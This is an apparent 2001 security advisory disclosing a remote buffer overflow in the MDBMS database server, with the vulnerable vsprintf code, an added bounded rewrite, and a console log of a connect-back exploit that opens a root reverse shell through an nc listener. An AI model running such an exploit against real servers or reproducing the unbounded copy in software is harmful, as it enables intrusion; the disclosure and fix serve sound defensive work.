Remote buffer overflow in MDBMS.

Type securityvulns
Reporter Securityvulns
Modified 2001-06-14T00:00:00


Dear bugtraq readers,

MDBMS is a SQL database server (currently) for UNIX systems. Versions 0.99b9 and below contain an exploitable buffer overflow in the handling of the \s console command.

When a user passes large buffers to the server in the form of multiple lines, these are appended to the end of each other. A subsequent call to the \s command causes the overflow.

Below is faulty code (from

void user::uprintf(char *s, ...)
{
    char b[10000];                     /* fixed-size stack buffer */
    int len = strlen(outbuf), newlen;
    va_list ap;

    va_start(ap, s);
    vsprintf(b, s, ap);                /* <---- unbounded write into b[] */
    va_end(ap);
    newlen = strlen(b);
    while (newlen + len + 10 >= outsize)
        outbuf = (char *)realloc(outbuf, outsize += 1000);
    strcat(outbuf, b);
    FD_SET(fd, &parent->wmask);
}

mu-b also found a buffer overflow in the "create database" system. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed - now table and database names can no longer be larger than 128 bytes.
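For comparison, here is an added example (not MDBMS code, and not the author's fix) of the uprintf() pattern above written with a bounded vsnprintf(): a format result longer than the 10000-byte buffer is refused instead of overrunning the stack. The names conn, conn_printf and conn_printf_selfcheck are hypothetical stand-ins for the class members in the original.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for the per-connection output state:
 * outbuf is the accumulated, NUL-terminated output; outsize its allocation. */
struct conn { char *outbuf; size_t outsize; };

/* Bounded replacement for the uprintf() pattern: vsnprintf() never writes
 * past b[], and an over-long result is reported instead of appended.
 * Returns 0 when the text was appended, -1 on truncation or allocation failure. */
int conn_printf(struct conn *c, const char *fmt, ...)
{
    char b[10000];                  /* same size as the advisory's buffer */
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(b, sizeof b, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= sizeof b)
        return -1;                  /* would not fit: refuse, do not overflow */

    size_t len = strlen(c->outbuf);
    while (len + (size_t)n + 10 >= c->outsize) {
        char *p = realloc(c->outbuf, c->outsize + 1000);
        if (!p)
            return -1;
        c->outbuf = p;
        c->outsize += 1000;
    }
    memcpy(c->outbuf + len, b, (size_t)n + 1);   /* copies the NUL too */
    return 0;
}

/* Self-check on constructed input: a short line is appended; a 12000-byte
 * line (longer than b[]) is rejected and leaves the buffer unchanged. */
int conn_printf_selfcheck(void)
{
    struct conn c = { calloc(16, 1), 16 };
    char big[12001];
    memset(big, 'A', 12000);
    big[12000] = '\0';
    if (conn_printf(&c, "%s ready.\n", "MDBMS") != 0) return 1;
    if (conn_printf(&c, "%s", big) != -1) return 2;
    if (strcmp(c.outbuf, "MDBMS ready.\n") != 0) return 3;
    free(c.outbuf);
    return 0;
}
```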

Information about the overflows was sent to He has now fixed the problems, and new versions of MDBMS can be found at:

We would like to thank Marty for his kind response and quick update.

Exploit example:

[teleh0r@localhost mdbms]$ ./

-- Remote code execution exploit - MDBMS <= 0.99b -- <> - Copyright (c) 2001

Usage: ./ -t <hostname> -b <back>

 -t <hostname>    : hostname to test
 -b <back>        : connect back to ip
 -p <port>        : port (default: 2223)
 -d <delay>       : delay before timeout
 -o <offset>      : offset
 -h               : return to heap

[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...

[teleh0r@localhost mdbms]$ ./ -t 127.1 -b localhost -h

-- Remote code execution exploit - MDBMS <= 0.99b -- <> - Copyright (c) 2001

-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...

-> * Successfully sent payload - good luck!

connect to [] from localhost.localdomain [] 1189
[teleh0r@localhost mdbms]$ % nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...

Exploit code attached.

Sincerely yours, teleh0r and mu-b

-- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard